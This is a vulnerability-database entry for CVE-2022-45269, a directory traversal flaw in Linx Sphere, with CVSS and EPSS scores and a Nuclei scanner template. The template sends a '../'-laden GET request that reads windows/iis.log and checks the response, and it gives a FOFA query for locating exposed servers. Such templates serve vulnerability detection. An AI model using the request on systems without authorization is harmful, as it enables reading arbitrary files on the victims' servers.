Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-45269
HistoryJul 11, 2024 - 10:28 a.m.

Linx Sphere - Directory Traversal

2024-07-1110:28:52
ProjectDiscovery
github.com
6
cve
cve2022
linx
lfi
scs
gmaolinx

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.006

Percentile

78.2%

A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
id: CVE-2022-45269

info:
  name: Linx Sphere - Directory Traversal
  author: robotshell
  severity: high
  description: |
    A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45269
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-45269
    cwe-id: CWE-22
    epss-score: 0.00238
    epss-percentile: 0.62196
    cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:*
  metadata:
    vendor: gmaolinx
    product: linx_sphere
    fofa-query: "SCS.Web.Server.SPI/1.0"
    verified: true
    max-request: 1
  tags: cve,cve2022,linx,lfi,scs

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Component Based Setup"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e41332608c7eb41673c7ccc760e661b7ee1682c3b66657f1083139b73b589b3302200d2d8767fbcfb0cd5bacdc48f0dde25a600b06ac775ee14b5d23be286c8be450:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.006

Percentile

78.2%

Related for NUCLEI:CVE-2022-45269